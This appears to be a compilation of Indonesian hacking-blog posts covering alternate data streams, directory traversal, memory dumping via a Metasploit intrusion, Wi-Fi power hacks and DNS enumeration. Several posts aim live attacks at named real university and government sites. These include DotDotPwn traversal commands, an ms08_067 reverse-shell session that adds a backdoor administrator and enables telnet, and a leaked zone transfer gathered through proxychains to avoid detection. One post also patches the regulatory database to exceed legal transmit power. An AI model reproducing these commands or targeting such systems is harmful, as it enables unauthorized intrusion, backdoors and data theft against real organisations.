ADS digunakan untuk mendukung HFS (Hirariecal File System) pada windows, sebagaimana MAC Os juga menggunakan ADS, ADS secara default tidak ditampilkan oleh Explorer windows baik pada juga CMD windows, meskipun show hidden files sudah dicentang yang ditampilkan ialah ekstensi file sebelum titik dua (:).

Live Example :

analisa file .DS_Store pada komputer XP.

apabila melalui CMD Windows, file .DS_Store akan tertampil dengan ekstensi .DS_Store sebagaimana gambar berikut :

lain jika kita scan melalui ADS Spy, ekstensi asli pada file ADS .DS_Store akan tertampil yaitu .DS_Store:AFP_Afpinfo

pada gambar diatas, ADS Spy melakukan scanning pada Drive berektensi NTSF yang tersedia di PC, lalu akan menampilkan file ADS yang ada.

hal ini cukup berbahaya karena, attacker bisa meninggalkan backdoor dengan model ADS seperti ini, misal dalam kasus :

attacker melakukan sploit ke mesin korban, lalu mengupload backdoor ke mesin korban dengan metode ADS, sehingga file backdoor tidak dikenali secara umum oleh target, dan attacker mengeksekusi dengan shell

C:\>start .\<nama_berkas>.<ekstensi>:<nama_stream>.<ekstensi>

banyak virus maker dan trojan bahkan spyware menggunakan metode ADS untuk menyerang mesin windows target.

oleh karena itu ADS Spy di rekomendasikan oleh CEH sebagai tools forensik untuk mesin windows kategori system hacking yang cukup simple namun powerfull

Good Luck!

a. Monitors ALL Server Functions
b. Alerts On Network Failures
c. Accessed From Everywhere
d. Configurable Log Files
e. Server Availability Reports
f. Network Scanner
g. etc ..

Alchemy Eye disertakan dalam CEH v7, software ini digunakan untuk kegunaan dalam metode footprinting dan reconnaissance pada ethical hacking.

penggunaan Alchemy Eye cukup mudah, karena dengan GUI yang sangat user friendly.

Contoh 1 : Monitoring mail server dan Monitoring URL / Page Web

Add Monitor > Completely New

set Logical Name

set Server Address dan Server IP Port

Add Monitor > Completely New

set Logical Name

set URL to checkin dan parameter lain

hasil konfigurasi diatas :

2. Reporting

salah satu feature dari Alchemy Eye yang sangat di sukai oleh para analis ialah adanya tools untuk generate report tersendiri, yang bentuk nya html. sehingga para analis / ethical hacker bisa melakukan background job scanner / monitoring, dan generate report di lain waktu.

Server Availibilty Report example

Response time average Report example

3. Manageable Monitoring

feature lain ialah manageable monitoring dimana pentester bisa meninggalkan desk selagi melakukan monitoring port / server tertentu, dan Alchemy Eye bisa mengirim laporan monitoring dalam beberapa kasus

pengiriman laporan bisa dilakukan lewat email atau broadcast ke local network computer.

4. Scanning Tools

Alchemy Eye juga mempunyai tools untuk melakukan scanning port dan host alive, namun port yang bisa di scan hanya standart service port saja, misal telnet, dns, pop3, imap dll..

well secara pendapat saya, Alchemy Eye adalah tools untuk monitoring server / port services yang bisa diandalkan untuk alternatif sofware monitoring di windows.

Good Luck! ;p

deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing

repository updates besarnya 65 GB, dengan bantuan dari beberapa teman, repository sebesar 65 GB ini bisa difetch ke repo hanya dengan waktu kurang dari 6 jam, dengan koneksi IX 100Mbps, dan koneksi IIX 1GBps.

sekaligus repo 64 akan ditambahkan di repository lokal bt.gxrg.org yang ada dialamat :

deb http://64.repository.backtrack-linux.org revolution main microverse non-free testing

setelah lengkap inilah konfigurasi untuk update repo lokal menggunakan repo GXRG

repo 32 BIT :

# GXRG BACKTRACK REPOSITORY
deb http://bt.gxrg.org/repo/all revolution main microverse non-free testing
deb http://bt.gxrg.org/repo/32 revolution main microverse non-free testing
deb http://bt.gxrg.org/repo/source revolution main microverse non-free testing
deb http://bt.gxrg.org/repo/updates revolution main microverse non-free testing

# OFFICIAL BACKTRACK REPOSITORY
# deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
# deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
# deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing
# deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing

repo 64 BIT :

# GXRG BACKTRACK REPOSITORY
deb http://bt.gxrg.org/repo/all revolution main microverse non-free testing
deb http://bt.gxrg.org/repo/64 revolution main microverse non-free testing
deb http://bt.gxrg.org/repo/source revolution main microverse non-free testing
deb http://bt.gxrg.org/repo/updates revolution main microverse non-free testing

# OFFICIAL BACKTRACK REPOSITORY
# deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
# deb http://64.repository.backtrack-linux.org revolution main microverse non-free testing
# deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing
# deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing

terima kasih kepada ediklife.com yang udah nemenin malem malem ngerepo XD

*ps apabila terjadi Hash Sum missmatch gunakan option no cache pada apt-get, contoh :

$ apt-get update -o Acquire::http::No-Cache=True

Good Luck!.

di dunia security, ada berbagai macam sertifikasi, yang bisa diliat di sini.

kemarin, salah satu teman kerja saya yaitu sakitjiwa baru saja melakukan sertifikasi CEH, dan menarik nya ada dua buku, dan 5 CD panduan CEH, saya minta ijin buat copy CD nya.

walaupun belum ijin buat bagi materi CEH di blog ini, tapi saya niat untuk membagi materi CEH di blog ini xD.

well you guys, you can consider to visit this blog oftenly.

nanti ada categories di sebelah kiri, dengan kategori baru, yaitu CEH, dan saya akan mengkategorikan setiap tulisan dari materi CEH disitu.

tulisan akan di update minimal 1 minggu sekali, dan maximal seminggu 2 kali.

Good Luck!.

pada cara pertama, beberapa user akan mengalami error seperti ini :

xilver2dragon@bt:~$ sudo apt-get dist-upgrade

[sudo] password for xilver2dragon: 

Reading package lists... Done

Building dependency tree       

Reading state information... Done

Calculating upgrade... Done

0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

1 not fully installed or removed.

After this operation, 0B of additional disk space will be used.

Do you want to continue [Y/n]? y

Setting up w3af (1.2-bt0) ...

tar: pybloomfiltermmap-0.2.0.tar.gz: Cannot open: No such file or directory

tar: Error is not recoverable: exiting now

tar: Child returned status 2

tar: Exiting with failure status due to previous errors

/var/lib/dpkg/info/w3af.postinst: line 4: cd: pybloomfiltermmap-0.2.0: No such file or directory

python: can't open file 'setup.py': [Errno 2] No such file or directory

svn: Working copy 'w3af' locked

svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)

dpkg: error processing w3af (--configure):

 subprocess installed post-installation script returned error exit status 1

Errors were encountered while processing:

 w3af

E: Sub-process /usr/bin/dpkg returned an error code (1)

error terjadi, karena proses dist-upgrade menambahkan schedule svn update pada w3af, yang apabila tercancel, maka svn akan ngelock directory, yang sebenarnya menurut gw user bisa melakukan svn update sendiri, tanpa harus dimasukkin ke batch proses update oleh backtrack.

solusi nya :

remove direktori w3af, dan pid process yang ngelock.

$ rm /var/lib/dpkg/info/w3af.postinst
$ rm -rf /pentest/web/w3af

lakukan kembali dist-upgrade

$ apt-get dist-upgrade

lalu untuk menampilkan kernel baru di grub, lakukan update-grub

$ update-grub

jika ingin install ulang w3af bisa :

$ cd /pentest/web/
$ svn co https://w3af.svn.sourceforge.net/svnroot/w3af/trunk w3af

lalu silahkan fix-splash atau hal lain.

Good Luck!

kemarin gw sempet melakukan pentest di salah satu perusahaan XXXXXXXXX, ada 1 hal yang pengen gw share disini, yaitu YAAA! masih ada nya bug di Directory Traversal! damn dude, elo sebagai web master emang harus banget merhatiin codingan elo itu ada bug ini apa enggak.

so setelah itu, gw konek internet, lalu gw melakukan SURFING! untuk cari website yang masih ada bug ini, sampailah gw di salah satu website yang memakai LokoMedia, gw suruh isal untuk analisa bug Directory Traversal di CMS ini, isal lalu menganalisa setiap script pada LokoMedia, terkhusus di hole pada file downlot.php

yang isi script nya ada lah berikut :

$direktori = \"files/\"; // folder tempat penyimpanan file yang boleh didownload
$filename = $_GET['file'];

$file_extension = strtolower(substr(strrchr($filename,\".\"),1));

#snip

tidak ada sanitize, serta metode pemanggilan nama file yang sangat rentan terhadap DT, script ini dikategorikan vurnable.

namun programmer lokomedia nampaknya sudah tau akan bug ini, tapi di biarkan, karena hasil investigasi bug ini tidak dapat menampilkan file ber ekstensi php.

di script berikut dilarang :

if ($file_extension=='php'){
  echo "<h1>Access forbidden!</h1>
        <p>Maaf, file yang Anda download sudah tidak tersedia atau filenya (direktorinya) telah diproteksi. <br />
        Silahkan hubungi <a href='mailto:redaksi@bukulokomedia.com'>webmaster</a>.</p>";
  exit;
}

so mari kita ganti misi nya untuk mendapatkan konfigurasi web server saja.

Real Live Example

kita akan melakukan crawling website, dan gw temukan beberapa web (banyak sebenarnya) yang mempunyai vuln di Directory Traversal.

hasil Directory Traversal :

LOOK! kita nemu server pemerintah NON JAIL SHELL! it means? yep kalo kita bisa owning lalu upload shell, exploit local, viola we got root :p

another example

hasil Directory Traversal :

another server yang NON JAIL SHELL!, soo pilah pilih web yang mau di hack, dan kita bisa owning satu server *yakin banget looooo :D

lalu bagaimana dengan server windows? see this

hasil Directory Traversal :

The Fuzzer

well adapula dengan traditional way, dengan cara tradisional, menentukan file target yang akan diambil, ex : /etc/passwd, lalu menambahkan setiap titik dua kali lalu slash, tergantung linux yang memakai slash ke kanan, atau windows yang memakai slash ke kiri.

example :

url encode :
/ => %2f

target file = /etc/passwd

http://vuln.com?vulnScript.php?file=..%2fetc%2fpasswd

http://vuln.com?vulnScript.php?file=..%2f..%2fetc%2fpasswd

http://vuln.com?vulnScript.php?file=..%2f..%2f..%2fetc%2fpasswd

dst .. sampe dapet.

ada cara yang lebih mudah, lets tool do it! yeah sekarang 2012 dude! *nuff said.

namanya DotDotPwn, tool untuk sangat sangat memudahkan DT, di backtrack 4 dahulu tools ini tersedia, tapi dihilangkan di backtrack 5, entah apa karena target DT semakin sedikit?

feature yang diberikan dotdotpwn sangat lengkap untuk melakukan directory traversal, bahkan ada metode stdout, os guessing, dan test hingga puluhan ribu metode.

gw berikan contoh untuk teknik penyerangan DT pada metode GET di URL.

untuk web dengan OS Unix

# perl dotdotpwn.pl -o unix -d 10 -u "http://fst.unsoed.ac.id:80/downlot.php?file=TRAVERSAL&x=1" -m http-url -k "root:"

untuk web dengan OS windows

# perl dotdotpwn.pl -o windows -d 15 -u "http://www.perpus.wima.ac.id/web/downlot.php?file=TRAVERSAL" -m http-url -k "127"

Good Luck! ;p

actually gw pernah membayangkan dan mencoba bagaimana sih seperti itu, dan apalagi gw ini bukan teroris seperti itu.

di security cabang spionase atau undercover seperti ini dengan mudah di pelajari dengan mengambil tahap pertama yaitu forensik, karena dengan melakukan forensik kita terbiasa dengan hal detail, lalu kita bisa hitung timing dan keperluan alat alat untuk melakukan forensik.

pada kali ini kita bahasa forensik Live RAM yang di dump pada satu file RAW, dengan bantuan tools Moonsols DumpIt.

Core Dumping / Memory Dumping / Storage Dumping adalah tekhnik untuk debugging sistem operasi secara offline, tanpa mengganggu kinerja sistem yang sedang berjalan, tipe dumping bisa bermacam macam, ada yang crash dumping, storage dumping dll.

So ini menjadi salah satu teknik forensik, di bidang security, dimana jika seseorang attacker ingin menganalisa sistem operasi target namun tidak mempunyai waktu yang cukup, maka core dumping biasa dilakukan untuk menganalisa sistem operasi yang sedang berjalan pada target di tempat lain.

Moonsols DumpIt

This utility is used to generate a physical memory dump of Windows machines. It works with both x86 (32-bits) and x64 (64-bits) machines.
The raw memory dump is generated in the current directory, only a confirmation question is prompted before starting.
Perfect to deploy the executable on USB keys, for quick incident responses needs.

seperti yang ditulis msuiche pada blog moonsols, DumpIt di release karena banyaknya yang melakukan forensik pada memory windows terbatas pada tools yang tersedia di publik, beda nya executable setiap arsitektur processor, serta tidak ada yang praktis.

DumpIt hanya satu file aplikasi executable, tanpa .ini atau file pendukung lainya, penggunaan nya hanya 1 click lalu hanya ada satu konfirmasi, yaitu yes (y) atau tidak (n).

begitu yes maka DumpIt akan melakukan dumping live RAM Memory ke dalam satu file, dalam direktori DumpIt.exe itu sendiri, sehingga DumpIt sangat cocok untuk ditaruh ke dalam USB Flashdisk Kosong.

besar file yang di dump adalah besar dari exact memory size, dimana jika RAM target sebesar 4GB, maka DumpIt akan membuat file dumping sebesar 4GB.

ada dua skenario attack pada kasus dumping memory untuk forensik, ialah :

Attacker membawa DumpIt ke satu flashdisk kosong, lalu bertemu dengan target, meminjam komputer windows tersebut, lalu mendumping live RAM Memory si target, Attacker mendapatkan file RAW dari Live RAM memori target lalu menganalisa nya di rumah.

Attacker melakukan penetrasi dari local network dengan metasploit, dengan cara cara :

# Enumeration

msf > ping -c 1 192.168.1.106
[*] exec: ping -c 1 192.168.1.106

PING 192.168.1.106 (192.168.1.106) 56(84) bytes of data.
64 bytes from 192.168.1.106: icmp_seq=1 ttl=128 time=114 ms

msf > nmap -p 445 192.168.1.106
[*] exec: nmap -p 445 192.168.1.106

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-06 11:09 WIT
Nmap scan report for 192.168.1.106
Host is up (0.00098s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:15:05:2E (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds

# Penetration

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set RHOST 192.168.1.106
RHOST => 192.168.1.106
msf  exploit(ms08_067_netapi) > set LHOST 192.168.1.109
LHOST => 192.168.1.109
msf  exploit(ms08_067_netapi) > exploit -f

[*] Started reverse handler on 192.168.1.109:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.109:4444 -> 192.168.1.106:1033) at 2012-02-06 08:26:21 +0700

# Upload DumpIt.exe

meterpreter > upload /root/gw/gear0wn/DumpIt/DumpIt.exe C:\

# Preparing service backdoor

reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f

# Set registry new value

meterpreter > reg setval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v AllowTSConnections -t REG_DWORD -d 1
meterpreter > reg setval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v fDenyTSConnections -t REG_DWORD -d 0

# Check registry value

meterpreter > reg queryval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v AllowTSConnections
meterpreter > reg queryval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v fDenyTSConnections

# Restart telnet server

meterpreter > execute -f cmd.exe -i
Process 4004 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\ANONYMOUS

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
idiot                    SUPPORT_388945a0
The command completed successfully.

C:\WINDOWS\system32>

C:\Windows\system32\>tlntsvr.exe start
C:\Windows\system32\>net user gxrg let_us_in /add
C:\Windows\system32\>net localgroup Administrators gxrg /add
C:\Windows\system32\>sc config TermService start= auto
C:\Windows\system32\>net start Termservice
C:\Windows\system32\>sc config tlntsvr start= auto
C:\Windows\system32\>net start tlntsvr

Running Telnet ke mesin target, login sesuai user yang telah baru dibuat, lalu jalankan DumpIt, dan pencet y, lalu enter, tunggu beberapa saat, file raw akan dibuat, dan copy ke mesin attacker RAW tersebut, lalu delete user yang telah dibuat, dan logout meterpreter dengan smoothly :).

*dibutuhkan Telnet Server karena, NC dan default shell windows pada meterpreter suck tidak bisa menjalankan DumpIt, dikarenakan interface kedua tools tsb.

Artikel lanjutan dari ini akan ditulis, yaitu analisa forensik RAW Memory dari hasil Dumping.

Good Luck! ;p.

 penjual : "ini saya ada alfa 2 watt mau gak? tapi kalo di backtrack cuman bisa 1 watt (30dbm) mentok"
gw : "enggak kok pak, bisa sampe berapa aja, sekuatnya alat"
penjual : "loh saya coba waktu itu pake iw reg BO, mentok 30dbm"
gw : "iya, tapi kan itu bisa di edit, bikin negara baru aja pak, jangan terpaku sama Bolivia (BO)"
penjual : "ohhh saya kurang ngerti, hehehe"

okey folks, kita sekarang bahas naikin power usb wifi adapter up to 2Watt. tutorial ini menggunakan contoh RT2870/RT3070 Wireless Adapter, dimana yang pake chipset Ralink ini banyak sekali, salah satu nya alfa hijau AWUS036H.

Update Driver Default Backtrack

pertama, kita update dulu driver default bawaan live cd backtrack, kenapa mesti update? biasalah live cd, enggak stabil diurusan driver, karena pas developer build live cd itu di satu hardware, sementara kalo udah sampe ke tangan user yang berbagai macam jenis hardware, masalahnya udah beda / bakal tambah masalah ini lah itu lah, jadi lebih baik kita update driver setelah install live cd backtrack.

root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/build
root@bt:~# cd/usr/src/
root@bt:~# wget http://bt.gxrg.org/other/driver/wireless/compat-wireless/compat-wireless-2.6/compat-wireless-2012-01-22.tar.bz2
root@bt:~# tar jxpf compat-wireless-2011-07-14.tar.bz2
root@bt:~# wget http://www.backtrack-linux.org/2.6.39.patches.tar
root@bt:~# tar xpf 2.6.39.patches.tar
root@bt:~# cd compat-wireless-2012-01-22
root@bt:~# patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch
root@bt:~# patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch
root@bt:~# patch -p1 < ../patches/zd1211rw-2.6.28.patch
root@bt:~# patch -p1 < ../patches/ipw2200-inject.2.6.36.patch
root@bt:~# make
root@bt:~# make install
root@bt:~# reboot

Update Wireless Regulatory Database

sekarang kita langsung update dan edit Wireless Reg Database, yang secara default di backtrack 5 - r1 masih ikut kernel biasa (ubuntu), entah kenapa sama developer backtrack ini enggak di edit.

root@bt:~# wget http://wireless.kernel.org/download/wireless-regdb/wireless-regdb-2011.04.28.tar.bz2
root@bt:~# tar -jxf wireless-regdb-2011.04.28.tar.bz2
root@bt:~# cd wireless-regdb-2011.04.28

edit db.txt, lalu tambahin country XX di baris paling bawah, tambahin line seperti ini:

root@bt:~/wireless-regdb-2011.04.28# nano db.txt

#kita akan buat negara baru, yaitu negara XX, negara bebas, sesuai user, tidak terpaku atas XX
#kita juga akan membuat semua adapter yang bekerja pada 2.4 GHz, dan 5 GHz bisa di power up kan.
#tambahin line dipaling bawah, seperti ini :

country XX:
        (2402 - 2492 @ 35), (N/A, 35)
        (4910 - 5835 @ 35), (N/A, 35)

setelah itu install dependencies yang dibutuhkan untuk compile make, yaitu python-m2crypto

root@bt:~/wireless-regdb-2011.04.28# apt-get install python-m2crypto

lalu langsung compile (make)

root@bt:~/wireless-regdb-2011.04.28# make
Generating regulatory.bin digitally signed by root...
./db2bin.py regulatory.bin db.txt ~/.wireless-regdb-root.key.priv.pem
sha1sum db.txt > sha1sum.txt

setelah selesai make, seperti diatas, lalu hasil dari make, yaitu regulatory.bin, kita copy paste ke CRDA.

root@bt:~/wireless-regdb-2011.04.28# cp regulatory.bin /usr/lib/crda/

setelah itu kita upgrade CRDA ke versi paling baru selain untuk install ulang CRDA dengan custom Regulatory yang kita buat diatas.

root@bt:~/# wget http://wireless.kernel.org/download/crda/crda-1.1.2.tar.bz2
root@bt:~/# tar -xvjf crda-1.1.2.tar.bz2
root@bt:~/# cd crda-1.1.2

copy pub key yang kita udah generate tadi lewat make diatas.

root@bt:~/crda-1.1.2# cp ~/wireless-regdb-2011.04.28/root.key.pub.pem pubkeys/

install dependencies untuk make selanjutnya.

root@bt:~/crda-1.1.2# apt-get install libnl-dev

setelah itu make, dan make install.

root@bt:~/crda-1.1.2# make
root@bt:~/crda-1.1.2# make install

lalu reboot,

Negara Baru XX, regulatory 35dBm (2000 mW)

setelah reboot, set regulatory di negara XX (yang diatas tadi kita buat).

root@bt:~# iw reg set XX

hasil :

root@bt:~# iw list |grep 35
		Maximum RX AMPDU length 65535 bytes (exponent: 0x003)
			* 2412 MHz [1] (35.0 dBm)
			* 2417 MHz [2] (35.0 dBm)
			* 2422 MHz [3] (35.0 dBm)
			* 2427 MHz [4] (35.0 dBm)
			* 2432 MHz [5] (35.0 dBm)
			* 2437 MHz [6] (35.0 dBm)
			* 2442 MHz [7] (35.0 dBm)
			* 2447 MHz [8] (35.0 dBm)
			* 2452 MHz [9] (35.0 dBm)
			* 2457 MHz [10] (35.0 dBm)
			* 2462 MHz [11] (35.0 dBm)
			* 2467 MHz [12] (35.0 dBm)
			* 2472 MHz [13] (35.0 dBm)

Good Luck! ;p

—————————————————————————–

Hari ini adalah Tahun baru Cina, Saya ingin mewakili VXRL untuk mengatakan “Kung Hei Fat Choy” untuk Anda semua.

Sekarang sedang ngetop ngetop nya dua hacking tim, Lulzsec dan Anonymous, yang dimana mereka memberi tau setiap kegiatan mereka lewat Twitter. Saya penasaran apa saja yang dilakukan mereka, dan siapa saja yang menjadi koneksi mereka, dan saya akan membahasnya secara snapshot.

Jaringan Retweet
Saya mulai dengan membuat program Python, lalu melakukan 100 request ke Twitter menggunakan Twitter API.

Menariknya, dari grafik Lulzsec, saya telah menemukan sejumlah kelompok yang sama / berkorelasi dengan Anonymous dan secara eksplisit yang menyatakan bahwa itu berasal dari Inggris, Swedia dan beberapa Bot IRC, saya percaya itu baik bagi mereka untuk memastikan tindakan mereka dan berita berhasil disebarkan, apalagi jika Twitter menutup salah satu dari rekening mereka, sementara itu, saya bisa menebak kekuatan utama mereka (atau sukarelawan?) berasal dari Eropa.

Akun-akun twitter yang mendukung Anonymous (mungkin dimiliki oleh mereka atau sukarelawan) meliputi:
- YourAnnoNews
- AnonOpsSweden
- AnonOpsBrazil
- AnonymousIRC
- BritAnonymous
- AnonymousBrazil
- AnonymousOnly

Dari grafik yang ada, menunjukkan kalo AnonOpeSweden bertindak sebagai team inti, karena AnonOpsSweden di follow oleh setiap anggota / team / grup.

Sementara LulzSec, meliputi:
- LulzSec
- LulzSec47
- LulzSecBrazil

Hal ini cukup menarik bahwa selain Eropa, kita bisa menemukan kelompok-kelompok dari Brasil mendukung kedua LulzSec dan Anonymous. Apakah berarti operasi besar berada di Brasil juga? :)

Liat gambar: Korelasi Kegiatan antara Anonymous & LulzSec

Gambar berikut menunjukkan, bahwa hampir dari semua anggota Anonymous memfollow AnonOpsSweden

Gambar diatas menunjukkan Lulzsec dan Anonymous mempunyai hubungan kedekatan.

Penjelasan Lebih Lanjut.

Saya akan membuat jalur AnonOpsSweden. Saya mendapatkan 2 twitter account lagi yang menarik, AnonCentral dan AnonyOps, yang menunjukan bahwa “Anonymous ada di semua tempat”.

Gambar diatas menunjukkan adanya akun twitter baru.

Topik menarik lainnya.

Baiklah, ini adalah pembahasan utama, dan perkiraan apa yang akan dilakukan oleh mereka? Saya membuat simple query dengan kata kunci “DDoS” dengan menggunakan Python.

>>> import twitter
>>> import json
>>> twitter_search = twitter.Twitter(domain="search.twitter.com")
>>> search_results = []
>>> search_results = twitter_search.search(q="DDoS")
>>> print json.dumps(search_results, sort_keys=True, indent=1)

Dengan mudahnya saya menemukan konversasi dengan kata kunci “DDoS” dengan hasil hingga 2345 pada 23 Jan 2012 (HKT), Hemm mereka nampaknya sudah mempunyai sukarelawan untuk melakukan DDoS Attack.

Sebagai seorang pengamat, itu bagus bagi kita untuk memiliki tindakan terbaru mereka dan juga rencana terbaru mereka, saya menghargai pola pikir Anonymous dan Lulzsec untuk mengubah pola pikir orang lain untuk membuat keamanan yang lebih baik, tapi bisa kita gunakan maksud lain? Namun, ini adalah dilema, etika dan keadilan terlihat seperti itu tidak dapat seimbang dalam dunia nyata, beberapa tugas memang harus diserahkan kepada para hacker.

Enjoy it ;-)

kalo menurut gw, dns pentesting itu sama kayak nambang, semakin kita dalem, dan ulet buat nambang, dijamin target akan semakin terlihat jelas, karena untuk menjadi seorang pentester, kita harus melihat kondisi network, oleh karena itu kita harus punya kemampuan mapping network.

fierce

fierce domain scan, lahir setelah pencipta fierce (rsnake) stress saat melakukan web pentest.

fierce dapat men scan DNS domain secara deep, dan disediakan wordlist untuk bruteforce subdomain lalu menscan nya.

command utama ialah

root@bt:/pentest/enumeration/dns/fierce# perl fierce.pl -dns ray16.info
DNS Servers for ray16.info:
        ns1.dreamhost.com
        ns3.dreamhost.com
        ns2.dreamhost.com

Trying zone transfer first...
        Testing ns1.dreamhost.com
                Request timed out or transfer not allowed.
        Testing ns3.dreamhost.com
                Request timed out or transfer not allowed.
        Testing ns2.dreamhost.com
                Request timed out or transfer not allowed.

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force

Checking for wildcard DNS...
Nope. Good.
Now performing 1895 test(s)...
^C

secara default fierce akan menscan, lalu mencoba melakukan simulasi zone transfer (untuk memastikan duplicating DNS Zone). dan me mapping dns yang misconfiguration.

pada kasus diatas, kasus scanning domain gw (ray16.info) mentok di zone transfer dikarenakan dreamhost sebagai hosting server gw sudah secara benar menolak adanya scanning zone transfer, sehingga fierce akan melakukan bruteforce subdomain sebanyak 1895 kali.

diatas gw cancel, karena bakal lamaaa.

DIG

okey langkah selanjutnya ialah menganalisa trace path menggunakan DIG, kita harus tau ns server yang di query recursive itu mana saja.

root@bt:/pentest/enumeration/dns/fierce# dig ray16.info +trace

; <<>> DiG 9.7.0-P1 <<>> ray16.info +trace
;; global options: +cmd
.                       8672    IN      NS      k.root-servers.net.
.                       8672    IN      NS      l.root-servers.net.
.                       8672    IN      NS      g.root-servers.net.
.                       8672    IN      NS      a.root-servers.net.
.                       8672    IN      NS      j.root-servers.net.
.                       8672    IN      NS      h.root-servers.net.
.                       8672    IN      NS      m.root-servers.net.
.                       8672    IN      NS      d.root-servers.net.
.                       8672    IN      NS      f.root-servers.net.
.                       8672    IN      NS      b.root-servers.net.
.                       8672    IN      NS      i.root-servers.net.
.                       8672    IN      NS      e.root-servers.net.
.                       8672    IN      NS      c.root-servers.net.
;; Received 228 bytes from 8.8.8.8#53(8.8.8.8) in 25 ms

info.                   172800  IN      NS      a0.info.afilias-nst.info.
info.                   172800  IN      NS      a2.info.afilias-nst.info.
info.                   172800  IN      NS      b0.info.afilias-nst.org.
info.                   172800  IN      NS      b2.info.afilias-nst.org.
info.                   172800  IN      NS      c0.info.afilias-nst.info.
info.                   172800  IN      NS      d0.info.afilias-nst.org.
;; Received 431 bytes from 199.7.83.42#53(l.root-servers.net) in 108 ms

ray16.info.             86400   IN      NS      ns1.dreamhost.com.
ray16.info.             86400   IN      NS      ns2.dreamhost.com.
ray16.info.             86400   IN      NS      ns3.dreamhost.com.
;; Received 95 bytes from 199.249.113.1#53(a2.info.afilias-nst.info) in 15 ms

ray16.info.             14400   IN      A       69.163.228.209
;; Received 44 bytes from 66.33.206.206#53(ns1.dreamhost.com) in 195 ms

diatas terlihat jelas bahwa saat ada request TCP ke ray16.info, maka NS akan melakukan query pertama kali ke DNS Google (8.8.8.8) lalu ke l.root-servers.net (199.7.83.42) lalu ke a2.info.afilias-nst.info (199.249.113.1) lalu ke server DNS terakhir yaitu ns1.dreamhost.com (66.33.206.206).

nah tugas dasar kita analisa setiap lompatan server, analisa setiap port yang kebuka, bagaimana kita bisa melakukan penetrasi, bangun pola serangan (contoh serangan ada dibawah) yang bagus.

okey sisanya bisa belajar sendiri, sekarang kita akan langsung ke domain yang VULNERABLE dikarenakan misconfiguration DNS Server.

VULNERABLE DOMAIN EXAMPLE.

kita akan coba membahas VULNERABLE Domain yang bisa sangat fatal jika attacker berniat melakukan mass attack tidak hanya tertuju ke satu server tapi kesemua server (contoh DDOS).

gw pake proxychains untuk stealth scan, karena gw gak mau resiko ketawan scan network orang, so be clean.

root@bt:/pentest/enumeration/dns/fierce# proxychains perl fierce.pl -dns dinus.ac.id
ProxyChains-3.1 (http://proxychains.sf.net)
DNS Servers for dinus.ac.id:
	ns1.dinus.ac.id
	ns2.dinus.ac.id
	ns3.dinus.ac.id
	ns4.dinus.ac.id

Trying zone transfer first...
	Testing ns1.dinus.ac.id

Whoah, it worked - misconfigured DNS server found:
dinus.ac.id.	86400	IN	SOA	ns1.dinus.ac.id. admin.dinus.ac.id. (
					2012011925	; Serial
					10800	; Refresh
					3600	; Retry
					604800	; Expire
					86400 )	; Minimum TTL
dinus.ac.id.	86400	IN	A	103.246.107.33
dinus.ac.id.	86400	IN	TXT	"v=msv1" "t=98801ad9cb59bb4c9f0542b52c571c"
dinus.ac.id.	86400	IN	TXT	"v=spf1" "include:outlook.com" "~all"
dinus.ac.id.	86400	IN	NS	ns1.dinus.ac.id.
dinus.ac.id.	86400	IN	NS	ns2.dinus.ac.id.
dinus.ac.id.	86400	IN	NS	ns3.dinus.ac.id.
dinus.ac.id.	86400	IN	NS	ns4.dinus.ac.id.
dinus.ac.id.	86400	IN	MX	10 mailserver.dinus.ac.id.
dinus.ac.id.	86400	IN	MX	20 mailserver.dinus.ac.id.
academic.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
admin.dinus.ac.id.	86400	IN	CNAME	webserver.dinustech.com.
administrator1.dinus.ac.id.	86400	IN	A	103.246.107.65
administrator1.dinus.ac.id.	86400	IN	HINFO	"iC2D-2800MHz/2GB" "M$ Widow"
administrator1.dinus.ac.id.	86400	IN	TXT	"Komputer Administrator"
alumni.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
aset.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
autodiscover.dinus.ac.id.	86400	IN	CNAME	autodiscover.outlook.com.
beasiswaunggulan.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
bem-fik.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
biku.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
